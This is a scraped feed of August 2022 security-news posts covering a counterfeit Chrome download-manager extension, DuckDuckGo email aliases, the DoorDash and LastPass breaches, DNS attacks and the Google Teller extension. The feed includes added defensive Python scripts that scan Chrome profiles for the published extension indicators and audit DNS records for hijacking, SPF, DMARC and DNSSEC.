		<span style="font-size:14px;">Extension ID: lcdlanlaneooailnebnhamiiieebikid</span>
	</p>

	<p style="margin-left: 40px;">
		<span style="font-size:14px;">.crx hash (SHA-256): b4b47730b62592c21368c2546e578342fff8383693e89211155c2d61d88058ba</span>
	</p>

	<p>
		 
	</p>

	<p>
		<span style="font-size:14px;">Web Store URL: hxxps://chrome.google[.]com/webstore/detail/internet-download-manager/lcdlanlaneooailnebnhamiiieebikid?hl=en</span>
	</p>

	<p>
		 
	</p>
</div>
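<p>
	The indicators above are what an incident responder would hunt for across managed endpoints. The script below is an added example, not BleepingComputer's, Tonec's or Google's code: it walks a Chrome profile's Extensions directory, reads each manifest, flags the article's extension ID, and can hash a collected .crx package against the published SHA-256. The profile it scans is constructed in a temporary directory; the benign extension ID, the names and the version numbers in that sample are invented for the demo.
</p>

```python
import hashlib
import json
import tempfile
from pathlib import Path

# Indicators published in the article: the counterfeit extension's ID and .crx SHA-256.
IOC_EXTENSION_IDS = {"lcdlanlaneooailnebnhamiiieebikid"}
IOC_CRX_SHA256 = {"b4b47730b62592c21368c2546e578342fff8383693e89211155c2d61d88058ba"}


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so multi-megabyte .crx files are not read into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def crx_matches_ioc(crx_path: Path) -> bool:
    """True if a collected .crx package hashes to a published known-bad value."""
    return sha256_file(crx_path) in IOC_CRX_SHA256


def scan_profile(profile_dir: Path) -> list[dict]:
    """List every extension version unpacked under <profile>/Extensions/.

    Chrome stores installed extensions unpacked as
    <profile>/Extensions/<32-char id>/<version>_<n>/manifest.json.
    Web Store IDs are 32 characters drawn from the letters a-p.
    """
    findings = []
    ext_root = profile_dir / "Extensions"
    if not ext_root.is_dir():
        return findings
    for ext_dir in sorted(p for p in ext_root.iterdir() if p.is_dir()):
        ext_id = ext_dir.name
        if len(ext_id) != 32 or not all("a" <= ch <= "p" for ch in ext_id):
            continue
        for version_dir in sorted(p for p in ext_dir.iterdir() if p.is_dir()):
            name = version = None
            manifest_path = version_dir / "manifest.json"
            if manifest_path.is_file():
                try:
                    manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
                    # Store-published names are often "__MSG_x__" keys resolved from _locales/.
                    name, version = manifest.get("name"), manifest.get("version")
                except (ValueError, UnicodeDecodeError):
                    pass  # corrupt manifest: still report the ID
            findings.append({
                "id": ext_id,
                "name": name,
                "version": version or version_dir.name,
                "ioc_id_match": ext_id in IOC_EXTENSION_IDS,
            })
    return findings


def build_sample_profile(root: Path) -> Path:
    """Constructed sample profile: one invented benign extension and one IOC hit.
    Everything except the IOC extension ID is made up for the demo."""
    profile = root / "Default"
    layout = {
        "abcdefghijklmnopabcdefghijklmnop": ("Example Benign Extension", "1.0.0"),
        "lcdlanlaneooailnebnhamiiieebikid": ("Internet Download Manager", "1.2.3"),
    }
    for ext_id, (name, version) in layout.items():
        version_dir = profile / "Extensions" / ext_id / f"{version}_0"
        version_dir.mkdir(parents=True)
        version_dir.joinpath("manifest.json").write_text(
            json.dumps({"manifest_version": 3, "name": name, "version": version}),
            encoding="utf-8",
        )
    return profile


def demo() -> list[dict]:
    """Scan the constructed profile and return all findings, IOC hits flagged."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_profile(build_sample_profile(Path(tmp)))


if __name__ == "__main__":
    # Real profile paths: ~/.config/google-chrome/Default (Linux),
    # %LOCALAPPDATA%\Google\Chrome\User Data\Default (Windows),
    # ~/Library/Application Support/Google/Chrome/Default (macOS).
    for finding in demo():
        flag = "IOC HIT" if finding["ioc_id_match"] else "ok"
        print(f"{flag:7} {finding['id']} {finding['name']!r} v{finding['version']}")
```

<p>
	Point <code>scan_profile()</code> at each Chrome profile directory on a host (Default, Profile 1, and so on) and ship the findings to your SIEM; an ID match is the reliable signal, since the displayed name is whatever the publisher chose.
</p>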

<p>
	<span style="font-size:14px;">BleepingComputer reached out to Tonec for comment, and we have also notified Google of the malicious extension prior to publishing.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"This is a fake extension and it should be avoided. Moreover it may contain spyware and adware," a Tonec spokesperson told BleepingComputer, referring to the counterfeit 'Internet Download Manager.'</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"We report it to Google, but it appears again in a short time."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Tonec also urged users to download the aforementioned IDM Integration Module extension that has 20 million downloads on Chrome.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">A quick search on the Chrome Web Store for "IDM," "IDM integration add-ons," or "Download Manager" will yield results containing extensions with hundreds of thousands of user installs, and favorable reviews that may appear promising.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">While not all of these extensions may be harmful, users should be cautious when installing new Chrome extensions and verify if these are official versions published by trusted software vendors.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Source: BleepingComputer</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/fake-chrome-extension-internet-download-manager-has-200-000-installs/" rel="external nofollow">https://www.bleepingcomputer.com/news/security/fake-chrome-extension-internet-download-manager-has-200-000-installs/</a></span>
</p>
]]></description><guid isPermaLink="false">7991</guid><pubDate>Fri, 26 Aug 2022 20:00:24 +0000</pubDate></item><item><title>DuckDuckGo's email protection service is now available for all users</title><link>https://nsaneforums.com/news/security-privacy-news/duckduckgos-email-protection-service-is-now-available-for-all-users-r7984/</link><description><![CDATA[<p>
	DuckDuckGo's email protection service is now available for all users. The privacy-friendly option, which <a data-wpel-link="internal" href="https://www.ghacks.net/2021/07/20/duckduckgo-is-launching-an-email-protection-service/" rel="external nofollow" target="_blank">debuted</a> last year, is still in beta.
</p>

<p>
	 
</p>

<p>
	<img alt="duckduckgo-email-protection-dashboard.we" class="ipsImage" data-ratio="75.10" height="540" width="688" src="https://www.ghacks.net/wp-content/uploads/2022/08/duckduckgo-email-protection-dashboard.webp">
</p>

<p>
	 
</p>


<p>
	Until now, the only way to get a @duck.com email address was to join a waitlist and wait a few weeks for the invitation to arrive.
</p>

<h3>
	What is DuckDuckGo's email protection service
</h3>

<p>
	DuckDuckGo's Email Protection is an email-alias service that hides your real email address. You create a personal @duck.com address and hand that out instead; mail sent to it is received by DuckDuckGo, stripped of email trackers, including those hidden in images and scripts, and then forwarded to your real inbox. The company has <a data-wpel-link="external" href="https://www.spreadprivacy.com/protect-your-inbox-with-duckduckgo-email-protection/" rel="external nofollow" target="_blank">announced</a> that it now also offers Link Tracking Protection, which removes tracking parameters from URLs in forwarded mail, and Smarter Encryption, which rewrites insecure HTTP links to HTTPS wherever possible.
</p>

<h4>
	How to get a @duck.com email address
</h4>

<p>
	<strong>Mobile users</strong>
</p>

<p>
	 
</p>

<p>
	If you have the DuckDuckGo mobile app on your <a data-wpel-link="external" href="https://play.google.com/store/apps/details?id=com.duckduckgo.mobile.android" rel="external nofollow" target="_blank">Android</a> mobile or <a data-wpel-link="external" href="https://apps.apple.com/us/app/duckduckgo-privacy-browser/id663592361" rel="external nofollow" target="_blank">iPhone</a>, go to the Settings page and tap on Email Protection.
</p>

<p>
	 
</p>

<p>
	<img alt="DuckDuckGos-email-protection-service-is-" class="ipsImage" data-ratio="75.10" height="533" width="720" src="https://www.ghacks.net/wp-content/uploads/2022/08/DuckDuckGos-email-protection-service-is-now-available-for-all-users.webp">
</p>

<h4>
	<strong>Desktop users</strong>
</h4>

<p>
	Do you prefer using it from your computer? Then you will need to install the DuckDuckGo extension for <a data-wpel-link="external" href="https://addons.mozilla.org/en-US/firefox/addon/duckduckgo-for-firefox/" rel="external nofollow" target="_blank">Firefox</a> or <a data-wpel-link="external" href="https://chrome.google.com/webstore/detail/duckduckgo-privacy-essent/bkdgflcldnnnapblkhphbgpggdiikppg" rel="external nofollow" target="_blank">Chrome</a>, and visit <a data-wpel-link="external" href="https://duckduckgo.com/email" rel="external nofollow" target="_blank">https://duckduckgo.com/email</a>. macOS users can use the service directly from the <a data-wpel-link="internal" href="https://www.ghacks.net/2022/04/13/duckduckgo-browser-for-mac-released-in-beta/" rel="external nofollow" target="_blank">DuckDuckGo browser</a>.
</p>

<p>
	 
</p>

<p>
	<img alt="How-to-get-a-duck-email-address-1.jpg" class="ipsImage" data-ratio="75.10" height="533" width="720" src="https://www.ghacks.net/wp-content/uploads/2022/08/How-to-get-a-duck-email-address-1.jpg">
</p>

<p>
	 
</p>

<p>
	Click the Get Started button, agree to the terms of service, and the site will prompt you to choose your @duck.com address. Next, choose the address your mail should be forwarded to, e.g. your Gmail or Outlook address.
</p>

<p>
	 
</p>

<p>
	Note: You may change the forwarding address at anytime from the Email Protection dashboard.
</p>

<p>
	 
</p>

<p>
	<img alt="duckduckgo-email-protection-change-forwa" class="ipsImage" data-ratio="75.10" height="540" width="654" src="https://www.ghacks.net/wp-content/uploads/2022/08/duckduckgo-email-protection-change-forwarding-address.webp">
</p>

<p>
	 
</p>

<p>
	DuckDuckGo's Email Protection does not use a password. When you sign in on a new browser or device, it sends a one-time authentication code to your registered forwarding address; enter it to reach your Email Protection dashboard. From then on you can give out your duck address in place of your real one whenever you create accounts with third-party services.
</p>

<p>
	 
</p>

<p>
	<img alt="duckduckgo-email-forwarding.webp" class="ipsImage" data-ratio="60.83" height="377" width="720" src="https://www.ghacks.net/wp-content/uploads/2022/08/duckduckgo-email-forwarding.webp">
</p>

<p>
	 
</p>

<p>
	Go ahead and send an email to your new duck address, or sign up for a newsletter with it; the forwarded mail arrives in your regular inbox with a banner noting that trackers were removed, plus a link to an email protection report.
</p>

<p>
	 
</p>

<p>
	<img alt="duckduckgo-email-report-scaled.jpg" class="ipsImage" data-ratio="63.06" height="273" width="720" src="https://www.ghacks.net/wp-content/uploads/2022/08/duckduckgo-email-report-scaled.jpg">
</p>

<p>
	 
</p>

<p>
	Clicking on the link opens a report that tells you which trackers were removed, whether links were upgraded to HTTPS, the sender's information, etc.
</p>

<p>
	 
</p>

<p>
	<img alt="duckduckgo-email-forwarding-report.webp" class="ipsImage" data-ratio="75.10" height="540" width="535" src="https://www.ghacks.net/wp-content/uploads/2022/08/duckduckgo-email-forwarding-report.webp">
</p>

<p>
	 
</p>

<p>
	The service is not limited to forwarding: you can reply to mail sent to your @duck.com address, and the sender will not see your real email address.
</p>

<p>
	 
</p>

<p>
	That's not all it can do, DuckDuckGo can also create unique private Duck addresses that you can use instead of your personal Duck ID. It's sort of like a temporary email ID. This adds another layer of privacy protection. These unique addresses can be generated from the dashboard. If you start receiving spam or phishing mails, you can deactivate this address, and create a new one to replace it. Using an email-alias can protect your real ID from being harvested by websites, spam, leaks, data breaches, etc.
</p>

<p>
	 
</p>

<p>
	Here are some free alternatives for DuckDuckGo email protection: <a data-wpel-link="external" href="https://simplelogin.io/" rel="external nofollow" target="_blank">SimpleLogin</a>, <a data-wpel-link="external" href="https://anonaddy.com/" rel="external nofollow" target="_blank">AnonAddy</a>, and <a data-wpel-link="external" href="https://relay.firefox.com/" rel="external nofollow" target="_blank">Firefox Relay</a>.
</p>

<p>
	 
</p>

<p>
	Which email alias-service do you use?
</p>

<p>
	 
</p>


<p>
	 
</p>

<p>
	<a href="https://www.ghacks.net/2022/08/26/duckduckgos-email-protection-service-is-now-available-for-all-users/" rel="external nofollow">DuckDuckGo's email protection service is now available for all users</a>
</p>
]]></description><guid isPermaLink="false">7984</guid><pubDate>Fri, 26 Aug 2022 19:36:07 +0000</pubDate></item><item><title>Personal Details of DoorDash Customers Accessed in Phishing Attack</title><link>https://nsaneforums.com/news/security-privacy-news/personal-details-of-doordash-customers-accessed-in-phishing-attack-r7973/</link><description><![CDATA[<p>
	<span style="font-size:20px;">Names, email addresses, delivery addresses, and partial payment card information was accessed.</span>
</p>

<p>
	 
</p>

<p>
	Some DoorDash customers have had their personal details stolen as part of a successful phishing campaign.
</p>

<p>
	<br />
	The company has confirmed that it recently detected unusual and suspicious activity on the computer network of a third-party vendor it works with. The stolen credentials of an employee at the vendor were used to access some of DoorDash's internal tools, which in turn allowed an unauthorized party to access customer and Dasher personal details.
</p>

<p>
	<br />
	Only a "small percentage of individuals" are thought to be affected, but DoorDash says the names, email addresses, delivery addresses, and partial payment card information (last four digits of a card number) of customers were accessed. No passwords, bank account numbers, full payment card details, social security, or social insurance details were compromised, however. For Dashers, the information accessed was limited to names, phone numbers, and email addresses.
</p>

<p>
	<br />
	DoorDash says it has already notified affected customers and set up a dedicated call center to answer any questions they may have. The company doesn't believe any of the information has been used for fraud or identity theft, but asks that customers take the usual advice of being cautious when receiving "unsolicited communications" or being asked to click suspicious links.
</p>

<p>
	 
</p>

<p>
	DoorDash is now working with the third-party vendor to enhance its security while also engaging a cybersecurity expert for "additional expertise and support." Perhaps DoorDash should insist that all third-party vendors it works with adopt phishing-resistant security keys, which would have stopped this kind of credential theft.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.pcmag.com/news/personal-details-of-doordash-customers-accessed-in-phishing-attack" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">7973</guid><pubDate>Fri, 26 Aug 2022 14:38:11 +0000</pubDate></item><item><title>LastPass confirms breach, says user data is safe</title><link>https://nsaneforums.com/news/security-privacy-news/lastpass-confirms-breach-says-user-data-is-safe-r7966/</link><description><![CDATA[<p>
	Many people around the globe use password managers to secure their credentials in a single place. One of the most popular tools in this area is the freemium application LastPass. Today, the company has informed customers that its development environment was breached in a cybersecurity incident.
</p>

<p>
	 
</p>

<p>
	<a href="https://blog.lastpass.com/2022/08/notice-of-recent-security-incident/" rel="external nofollow">In a blog post</a>, CEO Karim Toubba has stated that signs of unusual activity in its development environment were detected two weeks ago. Following this, the company immediately went into containment mode, deployed mitigation measures, partnered with a cybersecurity company, and began a detailed investigation.
</p>

<p>
	 
</p>

<p>
	Although this investigation is ongoing, Toubba says that no signs of access to user data or encrypted password vaults have been detected at this time. Only portions of LastPass' source code and some proprietary technical documentation have been stolen.
</p>

<p>
	 
</p>


<p>
	LastPass is yet to reveal how this breach occurred in the first place, but for now it has stated that an "unauthorized party" managed to gain access to portions of its development environment by compromising a single developer account.
</p>

<p>
	 
</p>

<p>
	The firm has emphasized that no customer data, Master Passwords, or user vaults have been breached because developer accounts don't have access to this information either. As such, it has recommended no user or administrative action at this point but says that it will continue providing updates as more details emerge.
</p>

<p>
	 
</p>

<p>
	For those keeping count, this is the second high-profile cybersecurity incident we have covered this week. <a href="https://www.neowin.net/news/plex-database-breached-emails-usernames-and-encrypted-passwords-stolen/" rel="external nofollow">Plex recently confirmed that its database has been breached too</a>, with emails, usernames, and encrypted passwords being stolen.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/lastpass-confirms-breach-says-user-data-is-probably-safe/" rel="external nofollow">LastPass confirms breach, says user data is safe</a>
</p>
]]></description><guid isPermaLink="false">7966</guid><pubDate>Fri, 26 Aug 2022 03:16:52 +0000</pubDate></item><item><title>DNS is now more important than ever for internet traffic</title><link>https://nsaneforums.com/news/security-privacy-news/dns-is-now-more-important-than-ever-for-internet-traffic-r7961/</link><description><![CDATA[<p>
	In 1992, librarian Jean Armour Polly coined the phrase “surfing the Internet” and for anyone that has since ridden its waves of data and information, chances are you have come across the term DNS. Today, the domain name system (DNS) is one of the foundations of the Internet, working quietly in the background to ensure smooth navigation in this space.
</p>

<p>
	 
</p>

<p>
	But before DNS, keeping track of hosts was a manual job: the name-to-address mappings for the whole network lived in a single, centrally maintained hosts file that every site had to download and keep in sync. That could not keep pace with the Internet's growth, and given there are now over 360 million domain name registrations, it would be unworkable today.
</p>

<p>
	 
</p>

<p>
	To address this issue, the DNS was created to provide an easy way of navigating the Internet and connecting users to websites - using domain names. Now, instead of humans acting as a switchboard for the Internet, the DNS is there to direct them to where they need to go. 
</p>

<p>
	 
</p>

<p>
	But what does DNS mean, and what role does it play in keeping organisations protected?
</p>

<p>
	 
</p>

<p>
	<strong><span style="font-size:20px;">Introducing the Domain Name System </span></strong>
</p>

<p>
	<br />
	The Domain Name System (DNS) is a hierarchical, decentralized naming system, created in 1983, that maps human-readable names to the numeric IP addresses that identify devices on the Internet. It does not route traffic: routing protocols deliver packets to an address, while DNS only tells a client which address to connect to.
</p>

<p>
	 
</p>

<p>
	DNS makes it possible to type ordinary words into your browser without memorizing long and often complex IP addresses. A DNS server is not one global database: authoritative servers hold the records for the zones they are responsible for, and recursive resolvers query them on behalf of clients and cache the answers for the lifetime of each record's TTL. The result behaves like a phone book of the Internet whose entries zone operators can add, delete and amend at any time.
</p>

<p>
	 
</p>

<p>
	Whenever you type a domain name into the address bar, a DNS lookup finds the corresponding IP address and your browser connects there. So why is it important? DNS can be considered one of the cornerstones of the Internet: if a name cannot be resolved to the correct IP address, you simply won't reach the website you're looking for.
</p>

<p>
	 
</p>

<p>
	However, the foundational importance of the DNS makes it a major target for criminals and there is an ever-present and increasing threat to businesses of all sizes. The loss of control of a critical domain name or a website being unavailable even for a short period will cause revenue and reputational damage for organizations.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:20px;"><strong>Volume and variety of DNS attacks increased</strong></span>
</p>

<p>
	 
</p>

<p>
	Over the last two years, we've seen a huge rise in the demand for bandwidth as the world adapts to new ways of working, with DNS now handling over 2 trillion queries every day. But alongside the increase in legitimate DNS queries there has been an unwelcome increase in malicious activity, with criminals looking to compromise DNS infrastructure for their own personal and financial gain.
</p>

<p>
	 
</p>

<p>
	There has been a significant rise in DDoS attacks. These attacks target the DNS infrastructure of organizations or DNS providers with huge volumes of DNS queries to prevent legitimate requests from reaching web servers and accessing websites and online services. 
</p>

<p>
	 
</p>

<p>
	While the nature of attacks has changed, the traditional threat of DNS hijacking or cache poisoning is still a real and legitimate threat.
</p>

<p>
	 
</p>

<p>
	Hijacking means the attacker changes the records themselves, typically by taking over the registrar or DNS-hosting account that controls the zone, so traffic for a legitimate domain is sent to a server the attacker controls. Cache poisoning achieves a similar result without touching the zone: forged answers are injected into a recursive resolver's cache, so that resolver's clients receive the attacker's IP address until the bogus entry expires. In either case users are redirected without noticing anything is wrong. Recently, cryptocurrency exchange Curve Finance was the victim of a DNS hijack; over $570,000 was lost to criminals who redirected its traffic to their own website. 
</p>

<p>
	 
</p>

<p>
	Organizations must ensure that key infrastructure is protected in a world of increasing digital threats. Having robust security policies that encompass the use, and protection, of domain names as key digital assets is vital. 
</p>

<p>
	 
</p>

<p>
	<span style="font-size:20px;"><strong>Protecting your websites from attack  </strong></span><br />
	It is crucial for every business to understand how their domain names are being used. Many will be utilized in a way to generate revenue, increase perception and reputation, or support critical infrastructure. But it may not always be apparent to internal stakeholders that a domain is no longer resolving to the correct website, or even at all. 
</p>

<p>
	 
</p>

<p>
	DNS traffic analysis, for example, is a good way to confirm that every domain resolves to where it should, highlighting anomalies that can be quickly corrected and brought back in line with the domain name policy. 
</p>

<p>
	 
</p>

<p>
	Analyzing the data will also highlight those high-traffic domain names which may need enhanced functionality, prioritization, and security management. It is worth identifying these key domains and evaluating the use of registry level locking, email security records, and DNSSEC.
</p>
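<p>
	The hijacking and cache-poisoning scenario above and the audit checklist in this section (traffic analysis against a baseline, email security records, DNSSEC) can be turned into a concrete check. The script below is an added example, not part of the TechRadar article or any vendor's product: it compares a snapshot of a domain's records against the owner's baseline and inspects the DS, SPF and DMARC records. The snapshots are constructed in-line using documentation address ranges and .test names so the code runs offline; in production the ZoneSnapshot fields would be filled from live lookups.
</p>

```python
from dataclasses import dataclass, field

SPF_TERMINALS = {"all", "+all", "-all", "~all", "?all"}


@dataclass
class ZoneSnapshot:
    """Resolver answers for one domain (constructed below; replace with live lookups)."""
    domain: str
    a: set[str] = field(default_factory=set)            # A records at the apex
    ns: set[str] = field(default_factory=set)           # NS set for the zone
    ds_present: bool = False                            # DS at the parent => signed delegation
    txt: list[str] = field(default_factory=list)        # TXT at the apex (SPF lives here)
    dmarc_txt: list[str] = field(default_factory=list)  # TXT at _dmarc.<domain>


@dataclass
class Baseline:
    """What the domain-name policy says the records should be."""
    a: set[str]
    ns: set[str]


def parse_spf(txt_records):
    """Return (present, terminal) for the SPF record, e.g. (True, '-all')."""
    for rec in txt_records:
        if rec.lower().startswith("v=spf1"):
            terminal = next((t for t in rec.split() if t.lower() in SPF_TERMINALS), None)
            return True, terminal
    return False, None


def parse_dmarc(txt_records):
    """Return the DMARC tag dict, or None when no v=DMARC1 record exists."""
    for rec in txt_records:
        if rec.replace(" ", "").lower().startswith("v=dmarc1"):
            tags = {}
            for part in rec.split(";"):
                if "=" in part:
                    key, value = part.split("=", 1)
                    tags[key.strip().lower()] = value.strip()
            return tags
    return None


def audit(snap, base):
    """Return (severity, message) findings; an empty list means every check passed."""
    findings = []
    unexpected = snap.a - base.a
    if unexpected:
        findings.append(("critical", f"A records outside baseline (possible hijack/poisoning): {sorted(unexpected)}"))
    if snap.ns != base.ns:
        findings.append(("critical", f"NS set changed: {sorted(snap.ns)} != {sorted(base.ns)}"))
    if not snap.ds_present:
        findings.append(("medium", "no DS record at the parent: delegation is not DNSSEC-signed"))
    spf_present, terminal = parse_spf(snap.txt)
    if not spf_present:
        findings.append(("high", "no SPF record"))
    elif terminal not in {"-all", "~all"}:
        findings.append(("high", f"SPF ends with {terminal!r}, not -all/~all: anyone may send as this domain"))
    dmarc = parse_dmarc(snap.dmarc_txt)
    if dmarc is None:
        findings.append(("high", "no DMARC record"))
    elif dmarc.get("p", "none").lower() == "none":
        findings.append(("medium", "DMARC p=none: spoofed mail is reported but still delivered"))
    return findings


# Constructed data: documentation address ranges and .test names, not real infrastructure.
BASELINE = Baseline(a={"203.0.113.10"}, ns={"ns1.example.test", "ns2.example.test"})

HEALTHY = ZoneSnapshot(
    domain="example.test",
    a={"203.0.113.10"},
    ns={"ns1.example.test", "ns2.example.test"},
    ds_present=True,
    txt=["v=spf1 include:_spf.example.test -all"],
    dmarc_txt=["v=DMARC1; p=reject; rua=mailto:dmarc@example.test"],
)

# The same zone after a hijack: the apex now points elsewhere, DNSSEC was never set up,
# SPF is neutral and DMARC only monitors.
HIJACKED = ZoneSnapshot(
    domain="example.test",
    a={"198.51.100.77"},
    ns={"ns1.example.test", "ns2.example.test"},
    ds_present=False,
    txt=["v=spf1 include:_spf.example.test ?all"],
    dmarc_txt=["v=DMARC1; p=none"],
)


def demo_healthy():
    return audit(HEALTHY, BASELINE)


def demo_hijacked():
    return audit(HIJACKED, BASELINE)


if __name__ == "__main__":
    for label, result in (("healthy", demo_healthy()), ("hijacked", demo_hijacked())):
        print(f"{label}: {len(result)} finding(s)")
        for severity, message in result:
            print(f"  [{severity}] {message}")
```

<p>
	Run this on a schedule from more than one vantage point: a resolver whose cache has been poisoned will disagree with the authoritative answer, and a registrar-level hijack shows up as an NS or A change everywhere at once.
</p>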

<p>
	 
</p>

<p>
	While the priority of DNS is to ensure that domain names are directed to the correct web content, enterprise providers will also offer proactive threat monitoring and intelligence that keeps the most critical domain names present and protected. Having robust security policies that encompass the use, and protection, of domain names as key digital assets is critical as major DNS outages or security incidents are now headline news for all the wrong reasons. 
</p>

<p>
	 
</p>

<p>
	These types of events damage not only revenue but the reputations of organisations. This is why choosing an enterprise DNS partner which has a globally distributed network of DNS nodes is key. Using enterprise-grade DNS ensures that critical domain names that support websites, online applications and email addresses continue to function, even if there is a DDoS attack on the network. 
</p>

<p>
	 
</p>

<p>
	DNS services come in all shapes and forms. At their heart they ensure domain names direct to where they should. The key test comes when the network is put under stress, either by an increase in legitimate traffic or by nefarious sources. For many organizations, the question is can they afford to risk their domain names ceasing to function due to the limitations of their DNS network. 
</p>

<p>
	 
</p>

<p>
	Auditing DNS on a regular basis is now considered best practice. Working with a domain security expert will provide you with forensic analysis and trusted recommendations to ensure domain names are adding to revenue and reputations rather than headaches and security concerns.
</p>
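
<p>
	The checks the two paragraphs above call for (does the domain still resolve, does it publish email authentication records, is the zone DNSSEC-signed) as a small audit script. This is an added example and not code from the article or from any DNS vendor. Lookups go through an injectable callable so the audit runs offline against a constructed snapshot; the dnspython-backed lookup (package name dnspython, API dns.resolver.resolve) is what you would pass in for a live run. Registry-level locking is a registrar setting that is not visible in DNS, so it is not checked.
</p>

```python
"""DNS posture audit for a list of domains (added example, not the article's code).

Checks: does each domain resolve at all, does it publish SPF and DMARC, and is
the zone signed with DNSSEC (a published DNSKEY RRset is used as the indicator).
Lookups go through an injectable callable so the audit can run offline against
the constructed SNAPSHOT below; pass dnspython_lookup to run it against live DNS.
"""
from typing import Callable, Dict, List

Lookup = Callable[[str, str], List[str]]   # (owner name, record type) -> rdata strings


def dnspython_lookup(name: str, rtype: str) -> List[str]:
    """Live resolver using dnspython 2.x (pip install dnspython); imported lazily."""
    import dns.resolver
    try:
        return [r.to_text() for r in dns.resolver.resolve(name, rtype)]
    except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN):
        return []


def _txt(records: List[str]) -> List[str]:
    # dnspython renders TXT rdata as one or more quoted chunks; strip the quotes.
    return [r.replace('"', "").strip() for r in records]


def audit_domain(domain: str, lookup: Lookup) -> Dict[str, object]:
    """Return the findings for one domain; an empty list means every check passed."""
    findings: List[str] = []

    addresses = lookup(domain, "A") + lookup(domain, "AAAA")
    if not addresses:
        findings.append("does not resolve (no A/AAAA)")

    spf = [t for t in _txt(lookup(domain, "TXT")) if t.startswith("v=spf1")]
    if not spf:
        findings.append("no SPF record")
    elif len(spf) > 1:
        findings.append("multiple SPF records (receivers treat this as a permanent error)")
    elif spf[0].split()[-1] in ("+all", "all"):   # "all" defaults to "+all" per RFC 7208
        findings.append("SPF ends in +all (any host may send as this domain)")

    dmarc = [t for t in _txt(lookup("_dmarc." + domain, "TXT")) if t.startswith("v=DMARC1")]
    if not dmarc:
        findings.append("no DMARC record")
    else:
        tags = dict(kv.split("=", 1) for kv in dmarc[0].replace(" ", "").split(";") if "=" in kv)
        if tags.get("p", "none") == "none":
            findings.append("DMARC policy is p=none (monitor only, nothing rejected)")

    if not lookup(domain, "DNSKEY"):
        findings.append("not DNSSEC-signed (no DNSKEY published)")

    return {"domain": domain, "resolves": bool(addresses), "findings": findings}


def audit(domains: List[str], lookup: Lookup) -> Dict[str, List[str]]:
    """Audit every domain; alert on the ones whose findings list is non-empty."""
    return {d: audit_domain(d, lookup)["findings"] for d in domains}


# Constructed snapshot standing in for live DNS answers (not real zone data).
SNAPSHOT = {
    ("shop.example.com", "A"): ["203.0.113.10"],
    ("shop.example.com", "TXT"): ['"v=spf1 include:_spf.example.net -all"'],
    ("_dmarc.shop.example.com", "TXT"): ['"v=DMARC1; p=reject; rua=mailto:dmarc@example.com"'],
    ("shop.example.com", "DNSKEY"): ["257 3 13 placeholder-key-material"],
    ("old-campaign.example.com", "TXT"): ['"v=spf1 +all"'],
    ("_dmarc.old-campaign.example.com", "TXT"): ['"v=DMARC1; p=none"'],
}


def snapshot_lookup(name: str, rtype: str) -> List[str]:
    return list(SNAPSHOT.get((name, rtype), []))


if __name__ == "__main__":
    for domain, findings in audit(["shop.example.com", "old-campaign.example.com"], snapshot_lookup).items():
        print(domain, "OK" if not findings else "; ".join(findings))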

<p>
	 
</p>

<p>
	<strong><a href="https://www.techradar.com/news/dns-is-now-more-important-than-ever-for-internet-traffic" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">7961</guid><pubDate>Thu, 25 Aug 2022 20:43:23 +0000</pubDate></item><item><title>Google Teller: browser makes a noise whenever Google gets data</title><link>https://nsaneforums.com/news/security-privacy-news/google-teller-browser-makes-a-noise-whenever-google-gets-data-r7949/</link><description><![CDATA[<p>
	To better demonstrate how much data Google is accumulating over the course of a browsing session, Dutch software developer and entrepreneur Bert Hubert created <a data-wpel-link="external" href="https://github.com/berthubert/googerteller" rel="external nofollow" target="_blank">Google Teller</a>.
</p>

<p>
	 
</p>

<p>
	<picture data-rv-in-image="rv-in-image-1"><source data-lazy-srcset="https://www.ghacks.net/wp-content/uploads/2022/08/google-teller-audio-google-connections.webp" srcset="https://www.ghacks.net/wp-content/uploads/2022/08/google-teller-audio-google-connections.webp" type="image/webp"><source data-lazy-srcset="https://www.ghacks.net/wp-content/uploads/2022/08/google-teller-audio-google-connections.png" srcset="https://www.ghacks.net/wp-content/uploads/2022/08/google-teller-audio-google-connections.png" type="image/png"><noscript><img class="alignnone size-full wp-image-180450 sp-no-webp" alt="google teller audio google connections" height="815" width="1221" srcset="https://www.ghacks.net/wp-content/uploads/2022/08/google-teller-audio-google-connections.png" src="https://www.ghacks.net/wp-content/uploads/2022/08/google-teller-audio-google-connections.png"></noscript></source></source></picture><img alt="google-teller-audio-google-connections.w" class="ipsImage" data-ratio="75.10" height="480" width="720" src="https://www.ghacks.net/wp-content/uploads/2022/08/google-teller-audio-google-connections.webp">
</p>

<p>
	 
</p>


<p>
	The browser extension makes a beep (closer to the sound classic modems made when data was transferred) whenever a connection to Google is established to transfer data to the company. It may begin even before a website is loaded, if Google is the default search provider. Beeps may then occur while a site is loading, after it has loaded, or when elements on the page are hovered over or selected.
</p>

<p>
	 
</p>

<p>
	To use the extension, simply install it in <a data-wpel-link="external" href="https://addons.mozilla.org/en-US/firefox/addon/googer-teller/" rel="external nofollow" target="_blank">Firefox</a>, Chrome or compatible browsers, and visit sites like you normally do.
</p>

<p>
	 
</p>

<p>
	<strong>Note</strong>: I could not find the extension in the Chrome Web Store. I tried various searches and it did not come up. Hubert confirmed that it is available for Chrome as well.
</p>

<p>
	 
</p>

<p>
